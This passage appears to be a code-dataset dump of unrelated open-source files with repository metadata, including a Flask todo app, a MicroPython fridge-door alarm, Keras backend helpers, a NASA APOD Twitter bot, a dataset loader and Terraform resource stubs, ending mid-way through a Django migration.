return get_time_difference(datetime.strptime(self.time_due.__str__(), datetime_format))
'''
This will return a new date & time string obtained by adding the values in the `time` keyword arguments to the current time
'''
def get_time(**time):
# TODO could I optimize those statements using comprehension for?
for item in ['hour', 'minute', 'day', 'month', 'year']:
if item not in time:
time[item] = 0
time_now = datetime.now() + relativedelta(hours=time['hour'], minutes=time['minute'], days=time['day'],
months=time['month'], years=time['year'])
return time_now.strftime(datetime_format)
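# Illustrative examples of get_time (output depends on the current time):
#
#   get_time(hour=3)          # e.g. 'Jan-01-2024 15:04' if it is noon on Jan 1st 2024
#   get_time(day=1, hour=12)  # now plus one day and twelve hours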
def get_time_difference(time):
time_now = datetime.now().replace(microsecond=0)
diff = time - time_now
return {'days': diff.days, 'seconds': diff.seconds}
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
return redirect('issues/404.html')
elif request.method == 'GET':
tasks = TODO.query.order_by(TODO.time_created).all()
time_now = datetime.now().strftime(datetime_format)
return render_template("index.html", tasks=tasks, mintime=time_now, maxtime=get_time(year=100),
display_time=get_time(hour=3))
else:
return "Invalid method: " + request.method
@app.route('/addTask/<content>/<due_date>', methods=['POST'])
def addTask(content, due_date):
if request.method == 'POST':
# content = request.form['content']
try:
datetime.strptime(due_date, datetime_format)
except:
print("The time is not in correct format")
task = TODO(content=content, time_due=due_date)
# Add to database
try:
db.session.add(task)
db.session.commit()
return redirect('/')
except:
print("Unable to add the task")
else:
return render_template('issues/unable_to.html', issue="method not applicable")
@app.route('/editTask/<int:tid>/<content>/<due_date>/<email_warning>', methods=['POST'])
def editTask(tid, content, due_date, email_warning):
task = TODO.query.get_or_404(tid)
# Accessing through form in edit
task.content = content
task.time_due = due_date
task.email_warning = email_warning
try:
db.session.commit()
return redirect('/')
except:
print("Unable to edit the task")
@app.route('/editTask/<int:tid>', methods=['GET'])
def edit_task_jump(tid):
return render_template('edit.html', task=TODO.query.get_or_404(tid), maxtime=get_time(year=100))
@app.route('/cmTask/<int:tid>', methods=['GET'])
def cmTask(tid):
if request.method == 'GET':
task = TODO.query.get_or_404(tid)
try:
db.session.delete(task)
db.session.commit()
return redirect('/')
except:
return render_template('issues/unable_to.html', issue='complete the task')
else:
return render_template('issues/unable_to.html', issue="method not applicable")
@app.route('/setting/<email_add>', methods=['POST'])
def setting(email_add):
write_file('email.cfg', email_add)
return ''
@app.route('/setting/', methods=['GET'])
def setting_redirect():
email = '' + read_file('email.cfg')
return render_template('setting.html', email=email)
def read_file(filename):
try:
with open(filename) as f:
return f.readline()
except IOError:
print("IO ERROR Raised. Reading file failed,")
f = open(filename, "w")
f.write('email@example.com')
f.close()
return 'content'
def write_file(filename, file_content):
try:
with open(filename, 'w') as f:
f.write(file_content)
except IOError:
print("IO ERROR Raised. Writing file failed,")
return ''
def send_email(todo_object):
pass
# THIS FUNCTION MUST BE ENABLED MANUALLY
# THIS FUNCTION MUST BE ENABLED MANUALLY
# THIS FUNCTION MUST BE ENABLED MANUALLY
# assert isinstance(todo_object, TODO)
# sendto = read_file('email.cfg')
# email_obj = demail(email_account, email_password, sendto)
# email_content = f'''
# Subject: Your task is about to due
    #     Hello, this is an automatic reminder that your task {todo_object.content} is due soon''' + '''
    #     ({todo_object.get_time_difference()['days']} days and {todo_object.get_time_difference()['seconds']} seconds) '''
# email_obj.send(email_content)
# return ''
if __name__ == '__main__':
app.run(debug=False)
| 31.318182
| 118
| 0.633962
| 1,471
| 0.213498
| 0
| 0
| 2,524
| 0.366328
| 0
| 0
| 2,349
| 0.340929
|
424371e9002a0d30915e7782779c23b77cf1168c
| 522
|
py
|
Python
|
homeassistant/components/solaredge/__init__.py
|
DavidDeSloovere/core
|
909a20b36d4df6724c955c2ae28cb82fe6d50c2e
|
[
"Apache-2.0"
] | 4
|
2020-08-10T20:02:24.000Z
|
2022-01-31T02:14:22.000Z
|
homeassistant/components/solaredge/__init__.py
|
DavidDeSloovere/core
|
909a20b36d4df6724c955c2ae28cb82fe6d50c2e
|
[
"Apache-2.0"
] | 78
|
2020-07-23T07:13:08.000Z
|
2022-03-31T06:02:04.000Z
|
homeassistant/components/solaredge/__init__.py
|
DavidDeSloovere/core
|
909a20b36d4df6724c955c2ae28cb82fe6d50c2e
|
[
"Apache-2.0"
] | 3
|
2022-01-17T20:10:54.000Z
|
2022-01-17T20:17:22.000Z
|
"""The solaredge integration."""
from __future__ import annotations
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from .const import DOMAIN
CONFIG_SCHEMA = cv.deprecated(DOMAIN)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Load the saved entities."""
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, "sensor")
)
return True
| 27.473684
| 77
| 0.781609
| 0
| 0
| 0
| 0
| 0
| 0
| 233
| 0.44636
| 70
| 0.1341
|
4243ae92dc1a6dc43f40406353ff665ec5905d97
| 3,241
|
py
|
Python
|
main.py
|
eteq/door_beeper
|
56c3ddcd9b24c66870aefa4dda0f3df3960049b1
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
eteq/door_beeper
|
56c3ddcd9b24c66870aefa4dda0f3df3960049b1
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
eteq/door_beeper
|
56c3ddcd9b24c66870aefa4dda0f3df3960049b1
|
[
"Apache-2.0"
] | null | null | null |
import uos
import utime
import machine
from machine import Pin, PWM
import utils
default_config = dict(
sleep_time_ms = 250,
freezer_delay_ms = 1000,
fridge_delay_ms = 1000,
write_battery_voltage = True,
piezo_plus_pin_num = 12,
piezo_min_pin_num = 33,
freezer_switch_pin_num = 23,
fridge_switch_pin_num = 21
)
try:
config_dct = {}
execfile('config.py', config_dct)
except Exception as e:
print("Could not run config file, using defaults:", default_config, '. File error:')
print(e)
globals().update(default_config)
else:
for varnm in default_config.keys():
if varnm in config_dct:
globals()[varnm] = config_dct[varnm]
print('Loaded config value for', varnm, ':', config_dct[varnm])
else:
globals()[varnm] = default_config[varnm]
print('Using default config value for', varnm, ':', default_config[varnm])
# setup pins
led_pin = Pin(13, Pin.OUT)
piezo_min_pin = Pin(piezo_min_pin_num, Pin.OUT)
freezer_switch_pin = Pin(freezer_switch_pin_num, Pin.IN, Pin.PULL_UP)
fridge_switch_pin = Pin(fridge_switch_pin_num, Pin.IN, Pin.PULL_UP)
#set initial state of pins
piezo_min_pin.value(0)
led_pin.value(0)
# set up PWM
piezo_plus_pwm = PWM(Pin(piezo_plus_pin_num), duty=512)
piezo_plus_pwm.deinit()
# how often to write out the battery status. None means don't do it at all
battery_time_spacing_secs = 600
# use an infinite loop to watch for door opening
def check_open(pin, name, open_times, piezo_args, delay_for_alarm_ms):
led_pin.value(0)
if pin.value() == 1:
print(name, 'open...')
led_pin.value(1)
if open_times[name] is None:
open_times[name] = utime.ticks_ms()
else:
dt = utime.ticks_diff(utime.ticks_ms(), open_times[name])
if dt > delay_for_alarm_ms:
print(name, 'has been open for more than', delay_for_alarm_ms, 'ms!')
utils.piezo_multitone(piezo_plus_pwm, *piezo_args)
else:
if open_times[name] is not None:
print(name, 'closed.')
open_times[name] = None
last_battery_time = None
open_times = {'Freezer': None, 'Fridge': None}
while True:
check_open(freezer_switch_pin, 'Freezer', open_times, ([1300,1000], 10, 500), freezer_delay_ms)
check_open(fridge_switch_pin, 'Fridge', open_times, ([1200,900], 10, 500), fridge_delay_ms)
utime.sleep_ms(sleep_time_ms)
# write out battery status if desired
if battery_time_spacing_secs is not None:
if last_battery_time is None:
last_battery_time = utime.time()
else:
if (utime.time() - last_battery_time) > battery_time_spacing_secs:
voltage = utils.read_battery_voltage()
print('Battery level:', voltage, 'V')
if write_battery_voltage:
with open('battery_voltage', 'a') as f:
f.write(str(utime.time()))
f.write(' ')
f.write(str(voltage))
f.write('\n')
last_battery_time = utime.time()
| 34.849462
| 100
| 0.622339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 481
| 0.148411
|
42440ed0ff98d8396cf65df66d98259bed94142f
| 6,034
|
py
|
Python
|
modules/backend.py
|
Uncle-Yuanl/model_zoo
|
455a2fd4ac5562a922f29e68de2f4e1fb2d3d2d8
|
[
"Apache-2.0"
] | null | null | null |
modules/backend.py
|
Uncle-Yuanl/model_zoo
|
455a2fd4ac5562a922f29e68de2f4e1fb2d3d2d8
|
[
"Apache-2.0"
] | null | null | null |
modules/backend.py
|
Uncle-Yuanl/model_zoo
|
455a2fd4ac5562a922f29e68de2f4e1fb2d3d2d8
|
[
"Apache-2.0"
] | null | null | null |
import os, sys
from distutils.util import strtobool
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
from tensorflow.python.util import nest, tf_inspect
from tensorflow.python.eager import tape
# from tensorflow.python.ops.custom_gradient import graph_mode_decorator
# Whether to use recomputation (gradient checkpointing)
do_recompute = strtobool(os.environ.get('RECOMPUTE', '0'))
# Zhihu article: https://zhuanlan.zhihu.com/p/349492378
# Paper: https://arxiv.53yu.com/pdf/1606.08415.pdf
def gelu_erf(x):
"""根据erf直接计算gelu
"""
# np的精度更高,默认64位,tf默认32位
return 0.5 * x * (1.0 + tf.math.erf(x / np.sqrt(2.0)))
def gelu_tanh(x):
cdf = 0.5 * (
1 + K.tanh(np.sqrt(2 / np.pi) * (x + 0.044715 * K.pow(x,3)))
)
return x * cdf
def set_gelu(version):
"""设置gelu版本
"""
version = version.lower()
assert version in ['erf', 'tanh'], 'gelu version must in erf or tanh'
if version == 'erf':
tf.keras.utils.get_custom_objects()['gelu'] = gelu_erf
elif version == 'tanh':
tf.keras.utils.get_custom_objects()['gelu'] = gelu_tanh
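# Illustrative usage of set_gelu (this module registers 'gelu' through
# tf.keras.utils.get_custom_objects(), so string activations pick it up):
#
#   set_gelu('tanh')
#   dense = tf.keras.layers.Dense(128, activation='gelu')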
def align(tensor, axes, ndim=None):
"""重新对齐tensor(批量版expand_dims)感觉更像是transpose
axes: 原来的第i维对齐新tensor的第axes[i]维;
ndim: 新tensor的维度
Example:
>>> tensor = tf.constant(np.arange(12).reshape(3,4), dtype=tf.float32)
>>> print(tensor)
tf.Tensor(
[[ 0. 1. 2. 3.]
[ 4. 5. 6. 7.]
[ 8. 9. 10. 11.]], shape=(3, 4), dtype=float32)
>>> same_dim = align(tensor, [0, -1], 2)
>>> print(same_dim)
tf.Tensor(
[[ 0. 1. 2. 3.]
[ 4. 5. 6. 7.]
[ 8. 9. 10. 11.]], shape=(3, 4), dtype=float32)
>>> more_dim = align(tensor, [0, -1], 3)
>>> print(more_dim)
tf.Tensor(
[[[ 0. 1. 2. 3.]]
<BLANKLINE>
[[ 4. 5. 6. 7.]]
<BLANKLINE>
[[ 8. 9. 10. 11.]]], shape=(3, 1, 4), dtype=float32)
"""
assert len(axes) == K.ndim(tensor)
indices = [None] * (ndim or max(axes))
for i in axes:
indices[i] = slice(None)
return tensor[indices]
def sequence_masking(x, mask, value=0, axis=None):
"""为序列条件mask的函数
parameters:
-----------
x: tensor
输入张量
mask: tensor
形如(batch_size, seq_len)的0-1矩阵
value: float or str
mask部分要被替换成的值,允许'inf'与'-inf'
axis: int
序列所在的轴,默认为1
"""
if mask is None:
return x
    # Make sure x has a dtype that supports the * operation
x_type = K.dtype(x)
if x_type == 'bool':
x = K.cast(x, 'int32')
    # Make sure mask has the same dtype as x
if K.dtype(mask) != K.dtype(x):
mask = K.cast(mask, K.dtype(x))
    if value == '-inf':
        # K.infinity is a function (defined below), so it has to be called
        value = -K.infinity()
    if value == 'inf':
        value = K.infinity()
value = K.cast(value, K.dtype(x))
    # Determine the axis
if axis is None:
axis = 1
if axis < 0:
axis = K.ndim(x) + axis
assert axis > 0, 'axis must be greater than 0'
    # Broadcast mask to the same rank as x
    for _ in range(axis - 1):  # only takes effect when axis > 1
        mask = K.expand_dims(mask, 1)  # keep axis 0 for batch_size
for _ in range(K.ndim(x) - K.ndim(mask)):
mask = K.expand_dims(mask, K.ndim(mask))
x = x * mask + value * (1 - mask)
    # Cast back to the original dtype of x
if x_type == 'bool':
x = K.cast(x, x_type)
return x
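# Illustrative usage of sequence_masking (the last position of the second sample
# is pushed to a large negative value, e.g. before a softmax):
#
#   scores = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
#   mask = tf.constant([[1.0, 1.0, 1.0], [1.0, 1.0, 0.0]])
#   masked = sequence_masking(scores, mask, value='-inf', axis=1)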
def recompute_grad(call):
    # ---------------------- original author's note: not fully understood ----------------------
    """Recompute (gradient checkpointing) decorator, used to wrap a keras layer's call function.
    Purpose: reduce GPU memory usage at the cost of some extra computation.
    Paper: https://arxiv.org/abs/1604.06174
    """
if not do_recompute:
return call
def inner(self, inputs, **kwargs):
        # In TF 2.x, tf.nest.flatten does not flatten numpy arrays or tf.Tensors
flat_inputs = nest.flatten(inputs)
call_args = tf_inspect.getfullargspec(call).args
for key in ['mask', 'training']:
if key not in call_args and key in kwargs:
del kwargs[key]
def kernel_call():
"""定义前向计算
"""
return call(self, inputs, **kwargs)
def call_and_grad(*inputs):
"""定义前向计算和反向计算
"""
with tape.stop_recording():
outputs = kernel_call()
outputs = tf.identity(outputs)
def grad_fn(doutputs, variables=None):
watches = list(inputs)
if variables is not None:
watches += list(variables)
with tf.GradientTape() as t:
t.watch(watches)
with tf.control_dependencies([doutputs]):
outputs = kernel_call()
grads = t.gradient(
outputs, watches, output_gradients=[doutputs]
)
del t
return grads[:len(inputs)], grads[len(inputs):]
return outputs, grad_fn
outputs, grad_fn = call_and_grad(*flat_inputs)
flat_outputs = nest.flatten(outputs)
def actual_grad_fn(*doutputs):
grads = grad_fn(*doutputs, variables=self.trainable_weights)
return grads[0] + grads[1]
watches = flat_inputs + self.trainable_weights
watches = [tf.convert_to_tensor(x) for x in watches]
tape.record_operation(
call.__name__, flat_outputs, watches, actual_grad_fn
)
return outputs
return inner
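# Illustrative usage of recompute_grad (the decorator is a no-op unless the
# RECOMPUTE environment variable is set to a truthy value before import):
#
#   class MyDense(tf.keras.layers.Dense):
#       @recompute_grad
#       def call(self, inputs):
#           return super(MyDense, self).call(inputs)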
def infinity():
"""返回默认的代表无穷大的数值
"""
return tf.keras.utils.get_custom_objects().get('infinity', 1e12)
def set_infinity(value):
"""设置新的代表无穷大的数值
"""
tf.keras.utils.get_custom_objects()['infinity'] = value
# Attach to keras.backend so they can be used like K.epsilon()
K.infinity = infinity
K.set_infinity = set_infinity
sys.modules['tensorflow.keras.backend'] = K
custom_objects = {
'gelu_erf': gelu_erf,
'gelu_tanh': gelu_tanh,
'gelu': gelu_erf,
}
tf.keras.utils.get_custom_objects().update(custom_objects)
if __name__ == '__main__':
import doctest
doctest.testmod()
| 27.678899
| 75
| 0.542592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,511
| 0.382891
|
42441c80231ccaad24f01bdd333bcd71d34fa2e7
| 2,957
|
py
|
Python
|
apod_daily.py
|
gultugaydemir/apod_daily
|
994ccebdf2646c1a700110d891ea73261773bea2
|
[
"CC0-1.0"
] | null | null | null |
apod_daily.py
|
gultugaydemir/apod_daily
|
994ccebdf2646c1a700110d891ea73261773bea2
|
[
"CC0-1.0"
] | null | null | null |
apod_daily.py
|
gultugaydemir/apod_daily
|
994ccebdf2646c1a700110d891ea73261773bea2
|
[
"CC0-1.0"
] | null | null | null |
import datetime
import os
import requests
import tweepy
from PIL import Image
# Get your own keys from developer.twitter.com
# You can find a detailed tutorial about authenticating accounts from github.com/gultugaydemir/Twitter_OAuth1.0a
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
# You can get your own API key from api.nasa.gov. However simply writing "DEMO_KEY" works too, as it can be seen on the website.
response = requests.get("https://api.nasa.gov/planetary/apod?api_key=DEMO_KEY") #This link contains the data we needed about the photo of the day.
data = response.json() # Converts the data to JSON format so that we can retrieve data from it.
description = data["title"] # Getting the title of the photo.
date = datetime.datetime.now().strftime("%y%m%d") # We need the {yymmdd} format for the source link.
source = "https://apod.nasa.gov/apod/ap{date}.html".format(date=date) # Creating the source link for the posted photo.
message = '"' + description + '" \n' + source # The status format for the image tweets.
message_video = '"' + description + '" \n' # The status format for the YouTube tweets.
try:
image = data["hdurl"] # The image URL from API.
except KeyError: # Code throws KeyError if a video is posted that day, since API doesn't include a "hdurl" element.
image = data["url"]
image = image.replace("embed/", "watch?v=")
api.update_status(status = message_video+ source + ' \n'+ image) # Bot only tweets the YouTube link and not a picture.
print("Video tweeted successfully.")
quit()
# Tweepy's "update_with_media" function only allows us to tweet an image from the local directory.
# Since posting the picture from a URL would be more practical, I'm using a function that will complete this step for me automatically.
def tweet_image(url, message):
tweeted=False
photo = 'photo.jpg'
request = requests.get(url, stream=True)
if request.status_code == 200:
with open(photo, 'wb') as media:
for url in request:
media.write(url)
while not tweeted:
try:
im = Image.open(photo)
w,h = im.size
print(w)
print(h)
api.update_with_media(photo, status=message)
print("Image tweeted successfully.")
tweeted = True
except tweepy.error.TweepError:
print("Resizing image...")
im = Image.open(photo)
width, height = im.size
print(width)
print(height)
im_resize = im.resize((int(width*0.99999999999), int(height*0.99999999999)), Image.ANTIALIAS)
im_resize.save(photo)
tweet_image(image, message) # Tweeting the picture with the status. Image URL and the status message are used as parameters.
| 40.506849
| 147
| 0.683801
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,408
| 0.476158
|
424460c099ec096eec540d08794ad2f9da57997e
| 6,414
|
py
|
Python
|
datasets/dad.py
|
LivingSkyTechnologies/Document_Layout_Segmentation
|
0db00a18fb39afa1efa8ae183bbd57309a6ebfcf
|
[
"MIT"
] | 4
|
2021-01-28T23:06:43.000Z
|
2022-01-15T19:17:07.000Z
|
datasets/dad.py
|
LivingSkyTechnologies/Document_Layout_Segmentation
|
0db00a18fb39afa1efa8ae183bbd57309a6ebfcf
|
[
"MIT"
] | 2
|
2021-01-25T21:54:05.000Z
|
2021-08-23T21:19:21.000Z
|
datasets/dad.py
|
LivingSkyTechnologies/Document_Layout_Segmentation
|
0db00a18fb39afa1efa8ae183bbd57309a6ebfcf
|
[
"MIT"
] | 2
|
2021-01-28T13:39:33.000Z
|
2022-01-15T19:17:13.000Z
|
import pickle
import os
import tensorflow as tf
from glob import glob
import utils.DataLoaderUtils as dlu
from utils.AnnotationUtils import write_dad_masks
# Static Dataset Config Options
TAG_NAMES = {'highlights',
'urls_to_supplementary',
'abbreviation',
'abstract',
'additional_file',
'affiliation',
'appendice',
'author_bio',
'author_contribution',
'author_name',
'availability_of_data',
'caption',
'conflict_int',
'contact_info',
'copyright',
'core_text',
'date',
'doi',
'figure',
'funding_info',
'index',
'keywords',
'list',
'math_formula',
'note',
'publisher_note',
'reference',
'section_heading',
'subheading',
'table',
'title',
'nomenclature',
'code',
'publisher',
'journal',
'corresponding_author',
'editor',
'ethics',
'consent_publication',
'MSC',
'article_history',
'acknowledgment',
'background'}
TAG_MAPPING = {'abbreviation': 'background',
'acknowledgment': 'background',
'additional_file': 'background',
'affiliation': 'background',
'article_history': 'background',
'author_contribution': 'background',
'availability_of_data': 'background',
'code': 'background',
'conflict_int': 'background',
'consent_publication': 'background',
'corresponding_author': 'background',
'date': 'background',
'ethics': 'background',
'index': 'background',
'journal': 'background',
'nomenclature': 'background',
'publisher_note': 'background',
'urls_to_supplementary': 'background',
'msc': 'background',
'MSC': 'background',
'highlights': 'background',
'subheading': 'section_heading'}
SAVED_PKL_FILE = 'saved_dad_paths.pkl'
BUFFER_SIZE = 500
MASKS_DIR = "masks"
DOCUMENTS_DIR = "documents"
ANNOTATIONS_DIR = "annotations"
def write_masks(dataset_dir, border_buffer=6):
anno_dir = os.path.join(dataset_dir, ANNOTATIONS_DIR)
anno_paths = glob(anno_dir + "/*/*json")
if os.path.exists(SAVED_PKL_FILE):
all_used_tags, class_mapping = pickle.load(open(SAVED_PKL_FILE, 'rb'))
else:
print("Running full mask generation, this may take a bit.")
all_used_tags = {}
for anno_json in anno_paths:
_, class_mapping, used_tags = write_dad_masks(anno_json,
ANNOTATIONS_DIR,
DOCUMENTS_DIR,
MASKS_DIR,
tag_names=TAG_NAMES,
tag_mapping=TAG_MAPPING,
buffer_size=border_buffer,
force=True)
all_used_tags.update(used_tags)
pickle.dump((all_used_tags, class_mapping), open(SAVED_PKL_FILE, 'wb'))
return all_used_tags, class_mapping
def build_dad_dataset(dataset_dir, img_size, batch_size, seed, debug=False):
all_used_tags, class_mapping = write_masks(dataset_dir)
# Filter out any pages that have no classes (this is helpful when messing around with active classes)
filtered_used_tags = {}
for path, used_tags in all_used_tags.items():
if len(used_tags) != 0:
filtered_used_tags[path] = used_tags
    # Split the paths with stratified sampling, to maintain the class distribution
train_paths, test_paths = dlu.stratify_train_test_split(filtered_used_tags, 0.10, seed=seed, debug=debug)
#%% - further split the test set into test and validation sets
test_used_tags = {}
for path, used_tags in filtered_used_tags.items():
if path in test_paths:
test_used_tags[path] = used_tags
test_paths, valid_paths = dlu.stratify_train_test_split(test_used_tags, 0.50, seed=seed, debug=debug)
train_dataset = tf.data.Dataset.from_tensor_slices(train_paths)
train_dataset = train_dataset.map(lambda x: dlu.parse_image(x, 0, MASKS_DIR), num_parallel_calls=tf.data.experimental.AUTOTUNE)
valid_dataset = tf.data.Dataset.from_tensor_slices(valid_paths)
valid_dataset = valid_dataset.map(lambda x: dlu.parse_image(x, 0, MASKS_DIR), num_parallel_calls=tf.data.experimental.AUTOTUNE)
test_dataset = tf.data.Dataset.from_tensor_slices(test_paths)
test_dataset = test_dataset.map(lambda x: dlu.parse_image(x, 0, MASKS_DIR), num_parallel_calls=tf.data.experimental.AUTOTUNE)
train = train_dataset.map(lambda x: dlu.load_image_train(x, img_size), num_parallel_calls=tf.data.experimental.AUTOTUNE)
train = train.shuffle(buffer_size=BUFFER_SIZE, seed=seed, reshuffle_each_iteration=True)
train = train.padded_batch(batch_size, drop_remainder=True, padded_shapes=([img_size, img_size, 3], [img_size, img_size, 1], [None, 4]))
train = train.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
valid = valid_dataset.map(lambda x: dlu.load_image_test(x, img_size), num_parallel_calls=tf.data.experimental.AUTOTUNE)
valid = valid.padded_batch(batch_size, drop_remainder=True, padded_shapes=([img_size, img_size, 3], [img_size, img_size, 1], [None, 4]))
valid = valid.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
test = test_dataset.map(lambda x: dlu.load_image_test(x, img_size), num_parallel_calls=tf.data.experimental.AUTOTUNE)
test = test.padded_batch(batch_size, drop_remainder=True, padded_shapes=([img_size, img_size, 3], [img_size, img_size, 1], [None, 4]))
test = test.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return train, valid, test, class_mapping
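# A minimal usage sketch (hypothetical dataset directory, laid out with the
# documents/, annotations/ and masks/ sub-folders this module expects):
#
#   train, valid, test, class_mapping = build_dad_dataset('data/DAD', img_size=512,
#                                                         batch_size=4, seed=42)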
| 42.76
| 140
| 0.588868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,481
| 0.230901
|
4248c96a6cf8583046ad1cd239d37aa7ac5e5d96
| 740
|
py
|
Python
|
terrascript/resource/ddelnano/mikrotik.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/ddelnano/mikrotik.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/ddelnano/mikrotik.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/ddelnano/mikrotik.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:21:43 UTC)
import terrascript
class mikrotik_bgp_instance(terrascript.Resource):
pass
class mikrotik_bgp_peer(terrascript.Resource):
pass
class mikrotik_dhcp_lease(terrascript.Resource):
pass
class mikrotik_dns_record(terrascript.Resource):
pass
class mikrotik_pool(terrascript.Resource):
pass
class mikrotik_scheduler(terrascript.Resource):
pass
class mikrotik_script(terrascript.Resource):
pass
__all__ = [
"mikrotik_bgp_instance",
"mikrotik_bgp_peer",
"mikrotik_dhcp_lease",
"mikrotik_dns_record",
"mikrotik_pool",
"mikrotik_scheduler",
"mikrotik_script",
]
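# Illustrative usage sketch (not part of the generated module). The resource
# attributes below (name, address, ttl) are assumptions about the upstream
# mikrotik provider's schema, chosen only for demonstration.
if __name__ == "__main__":
    config = terrascript.Terrascript()
    config += mikrotik_dns_record(
        "example",            # Terraform resource label
        name="router.local",  # assumed attribute
        address="10.0.0.1",   # assumed attribute
        ttl=300,              # assumed attribute
    )
    # Render the configuration; the exact dump API may differ across terrascript versions.
    print(str(config))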
| 17.209302
| 73
| 0.754054
| 388
| 0.524324
| 0
| 0
| 0
| 0
| 0
| 0
| 252
| 0.340541
|
424a2a5c3d067c0a48cf8560895baac37e4bf0ea
| 812
|
py
|
Python
|
test/threaddd.py
|
liaohongdong/IPProxy
|
90152f02708717c661b7c1532e4a131a55103950
|
[
"MIT"
] | null | null | null |
test/threaddd.py
|
liaohongdong/IPProxy
|
90152f02708717c661b7c1532e4a131a55103950
|
[
"MIT"
] | 1
|
2021-03-31T19:17:41.000Z
|
2021-03-31T19:17:41.000Z
|
test/threaddd.py
|
liaohongdong/IPProxy
|
90152f02708717c661b7c1532e4a131a55103950
|
[
"MIT"
] | null | null | null |
import time
import queue
import threading
# Worker: pull items from the shared queue until a None sentinel arrives, then exit.
def aaa(i):
while True:
item = q.get()
if item is None:
print("线程%s发现了一个None,可以休息了^-^" % i)
break
time.sleep(0.01)
print('aaaaa -> ' + str(i) + " ---> " + str(item))
q.task_done()
if __name__ == '__main__':
num_of_threads = 5
source = [i for i in range(1, 21)]
q = queue.Queue()
threads = []
for i in range(1, num_of_threads + 1):
t = threading.Thread(target=aaa, args=(i,))
threads.append(t)
t.start()
for item in source:
time.sleep(0.01)
q.put(item)
q.join()
# print("-----工作都完成了-----")
# # 停止工作线程
for i in range(num_of_threads):
q.put(None)
# for t in threads:
# t.join()
# print(threads)
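    # Added sketch (not in the original script): explicitly wait for the workers,
    # which is what the commented-out join loop above was meant to do.
    for t in threads:
        t.join()
    print("All worker threads have exited.")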
| 20.820513
| 58
| 0.507389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 187
| 0.217442
|
424a464b22116de9e6ed995f96ff3b93bc5bdfe1
| 665
|
py
|
Python
|
Codes/Liam/203_remove_linked_list_elements.py
|
liuxiaohui1221/algorithm
|
d80e64185ceb4798ac5389bfbd226dc1d406f6b5
|
[
"Apache-2.0"
] | 256
|
2017-10-25T13:02:15.000Z
|
2022-02-25T13:47:59.000Z
|
Codes/Liam/203_remove_linked_list_elements.py
|
liuxiaohui1221/algorithm
|
d80e64185ceb4798ac5389bfbd226dc1d406f6b5
|
[
"Apache-2.0"
] | 56
|
2017-10-27T01:34:20.000Z
|
2022-03-01T00:20:55.000Z
|
Codes/Liam/203_remove_linked_list_elements.py
|
liuxiaohui1221/algorithm
|
d80e64185ceb4798ac5389bfbd226dc1d406f6b5
|
[
"Apache-2.0"
] | 83
|
2017-10-25T12:51:53.000Z
|
2022-02-15T08:27:03.000Z
|
# Runtime: 68 ms
# Memory usage: 16.6 MB
# Approach: use a sentinel node, inserted before the head node
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeElements(self, head: ListNode, val: int) -> ListNode:
        # Sentinel node, inserted before the head
sentinel = ListNode(0)
sentinel.next = head
        # Initialize two pointers, prev and curr
prev, curr = sentinel, head
while curr:
if curr.val == val:
prev.next = curr.next
else:
prev = curr
            # Advance to the next element
curr = curr.next
return sentinel.next
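# Illustrative self-check (not part of the original solution). On LeetCode the
# ListNode class is supplied by the judge; it is defined here only so the sketch
# can run on its own.
if __name__ == "__main__":
    class ListNode:
        def __init__(self, x):
            self.val = x
            self.next = None

    # Build 1 -> 2 -> 6 -> 3 -> 6 and remove every node whose value is 6.
    head = None
    for v in reversed([1, 2, 6, 3, 6]):
        node = ListNode(v)
        node.next = head
        head = node

    head = Solution().removeElements(head, 6)
    values = []
    while head:
        values.append(head.val)
        head = head.next
    print(values)  # expected: [1, 2, 3]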
| 22.166667
| 67
| 0.538346
| 517
| 0.675817
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.452288
|
424d5b248c6b3fcd0ec5e3855e8a59d969b36415
| 1,296
|
py
|
Python
|
bailleurs/migrations/0001_initial.py
|
MTES-MCT/appel
|
3b840ccea600ef31cfea57721fe5e6edbdbc2c79
|
[
"MIT"
] | null | null | null |
bailleurs/migrations/0001_initial.py
|
MTES-MCT/appel
|
3b840ccea600ef31cfea57721fe5e6edbdbc2c79
|
[
"MIT"
] | 2
|
2021-12-15T05:10:43.000Z
|
2021-12-15T05:11:00.000Z
|
bailleurs/migrations/0001_initial.py
|
MTES-MCT/appel
|
3b840ccea600ef31cfea57721fe5e6edbdbc2c79
|
[
"MIT"
] | 1
|
2021-12-28T13:06:06.000Z
|
2021-12-28T13:06:06.000Z
|
# Generated by Django 3.2.5 on 2021-07-06 14:18
import uuid
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Bailleur",
fields=[
